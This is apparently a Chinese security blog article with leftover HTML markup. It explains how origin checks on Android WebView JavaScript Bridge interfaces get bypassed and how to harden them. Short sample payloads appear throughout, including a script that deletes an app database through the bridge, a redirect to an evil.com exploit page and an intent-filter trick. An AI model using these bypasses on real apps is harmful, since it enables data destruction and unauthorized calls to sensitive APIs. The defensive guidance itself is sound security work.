Android JSB基于来源校验的防护绕过分析与加固方案<\/h1>

引言<\/h2>
在移动混合开发中，JavaScript Bridge（JSB）作为连接Web与原生代码的核心组件，极大提升了开发效率，但同时也引入了显著的安全风险。攻击者可能通过JSB漏洞越权调用敏感API，导致数据泄露、恶意操作等严重后果。通常情况下会通过校验调用JSB接口的访问来源网页来进行防护，而该防护在大多情况下仍会存在绕过。<\/p>

JSB工作原理与攻击面<\/h2>

JSB通过WebView在JavaScript与原生代码（Java\/Kotlin\/Swift）间建立通信通道：<\/p>

Android实现<\/strong>：使用@JavascriptInterface<\/code>注解暴露Java方法<\/li>

iOS实现<\/strong>：通过WKScriptMessageHandler<\/code>注册消息处理器<\/li> <\/ul> 风险场景示例<\/strong>：<\/p> @JavascriptInterface<\/span> <\/span><\/span>public<\/span> void<\/span> deleteFile<\/span>(<\/span>String path)<\/span> {<\/span> <\/span><\/span> new<\/span> File(<\/span>path).<\/span>delete<\/span>();<\/span> \/\/ 无权限校验的高危操作 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>可信域名校验的核心逻辑<\/h2> 开发者通常通过校验WebView加载页面的域名或URL来确保请求来源的合法性，这是防御恶意调用的一线屏障。<\/p> Android校验示例<\/strong>：<\/p> private<\/span> boolean<\/span> isSafeDomain<\/span>(<\/span>String url)<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> URL uri =<\/span> new<\/span> URL(<\/span>url);<\/span> <\/span><\/span> return<\/span> ALLOWED_DOMAINS.<\/span>contains<\/span>(<\/span>uri.<\/span>getHost<\/span>());<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> return<\/span> false<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>绕过来源校验的攻击手法<\/h2> 1. WebView协议漏洞利用<\/h3> 攻击场景<\/strong>：利用file:\/\/<\/code>、content:\/\/<\/code>等本地协议加载恶意HTML文件，绕过远程域名校验。<\/p> 漏洞代码<\/strong>：<\/p> webView.<\/span>loadUrl<\/span>(<\/span>"file:\/\/\/sdcard\/evil.html"<\/span>);<\/span> \/\/ 加载本地恶意文件 <\/span><\/span><\/span><\/code><\/pre>攻击Payload<\/strong>：<\/p> <script<\/span>> <\/span><\/span> window.jsBridge<\/span>.deleteFile<\/span>("\/data\/data\/com.app\/database.db"<\/span>); <\/span><\/span><\/script<\/span>> <\/span><\/span><\/code><\/pre>绕过原理<\/strong>：当WebView加载file:\/\/<\/code>协议时，url.getHost()<\/code>返回null，白名单校验可能被绕过。<\/p> 2. 跨域重定向劫持<\/h3> 攻击场景<\/strong>：在可信域名页面中注入恶意重定向代码，跳转到攻击者控制的域名。<\/p> 恶意JavaScript代码<\/strong>：<\/p> window.location<\/span>.href<\/span> =<\/span> "http:\/\/evil.com\/exploit.html"<\/span>; <\/span><\/span><\/code><\/pre>替代方案<\/strong>：找到一个可信白名单下URL重定向漏洞，然后重定向到恶意payload中。<\/p> 绕过原理<\/strong>：部分校验逻辑仅在页面初始加载时检查URL，未监控后续重定向行为。<\/p> 3. Intent Scheme攻击<\/h3> 攻击场景<\/strong>：通过自定义Intent Scheme触发WebView加载恶意内容。<\/p> 攻击Payload<\/strong>：<\/p> <intent-filter<\/span>> <\/span><\/span> <data<\/span> android:scheme<\/span>=<\/span>"intent"<\/span> android:host<\/span>=<\/span>"evil.com"<\/span> \/> <\/span><\/span><\/intent-filter<\/span>> <\/span><\/span><\/code><\/pre>绕过原理<\/strong>：若应用未正确处理Intent的data字段，可能将evil.com解析为合法来源。<\/p> 4. WebView调试漏洞<\/h3> 攻击场景<\/strong>：启用WebView调试模式时，攻击者通过Chrome DevTools注入恶意代码。<\/p> 漏洞配置<\/strong>：<\/p> if<\/span> (<\/span>BuildConfig.<\/span>DEBUG<\/span>)<\/span> {<\/span> <\/span><\/span> WebView.<\/span>setWebContentsDebuggingEnabled<\/span>(<\/span>true<\/span>);<\/span> \/\/ 生产环境应禁用 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>绕过原理<\/strong>：攻击者直接通过chrome:\/\/inspect<\/code>远程控制WebView，完全绕过域名限制。<\/p> 加固来源校验方案<\/h2> 1. 协议与路径深度校验<\/h3> 通过协议+具体到路径，进一步收敛能够调用JSB的风险暴露面。<\/p> private<\/span> boolean<\/span> isSafeSource<\/span>(<\/span>String url)<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> URL uri =<\/span> new<\/span> URL(<\/span>url);<\/span> <\/span><\/span> return<\/span> "https"<\/span>.<\/span>equals<\/span>(<\/span>uri.<\/span>getProtocol<\/span>())<\/span> &&<\/span> <\/span><\/span> ALLOWED_DOMAINS.<\/span>contains<\/span>(<\/span>uri.<\/span>getHost<\/span>())<\/span> &&<\/span> <\/span><\/span> uri.<\/span>getPath<\/span>().<\/span>startsWith<\/span>(<\/span>"\/safe\/path\/"<\/span>);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> return<\/span> false<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>2. 动态Token绑定（防御重定向攻击）<\/h3> 实现逻辑<\/strong>：在合法页面加载时，原生层向Web注入动态Token，后续接口调用需携带该Token。<\/p> Android示例<\/strong>：<\/p> \/\/ 页面加载时注入Token <\/span><\/span><\/span><\/span>String token =<\/span> generateSecureToken();<\/span> <\/span><\/span>webView.<\/span>evaluateJavascript<\/span>(<\/span>"window.API_TOKEN = '"<\/span> +<\/span> token +<\/span> "';"<\/span>,<\/span> null<\/span>);<\/span> <\/span><\/span> <\/span><\/span>\/\/ JSB接口校验 <\/span><\/span><\/span><\/span>@JavascriptInterface<\/span> <\/span><\/span>public<\/span> void<\/span> sensitiveOperation<\/span>(<\/span>String params,<\/span> String token)<\/span> {<\/span> <\/span><\/span> if<\/span> (!<\/span>validateToken(<\/span>token))<\/span> {<\/span> <\/span><\/span> return<\/span>;<\/span> \/\/ 无效Token拒绝执行 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span> \/\/ 执行操作... <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>思考与总结<\/h2> 来源校验的局限性<\/h3> 无法防御同源XSS攻击<\/strong>：若合法域名存在XSS漏洞，攻击者仍可在可信上下文中调用JSB<\/li> 依赖客户端环境<\/strong>：所有校验逻辑均在客户端执行，可能被逆向工程绕过<\/li> <\/ul> 纵深防御建议<\/h3> 服务端参与鉴权<\/strong>：关键操作需向服务端发起二次验证<\/li> 运行时环境检测<\/strong>：通过BuildConfig<\/code>、Signature<\/code>等判断是否为正式环境<\/li> 代码混淆加固<\/strong>：使用ProGuard、R8等工具混淆JSB接口类名<\/li> <\/ol> 终极防护原则<\/h3> 永远不要信任Web层传递的任何数据，即便来源"合法"也需实施完备的输入验证、权限控制与操作审计。<\/p>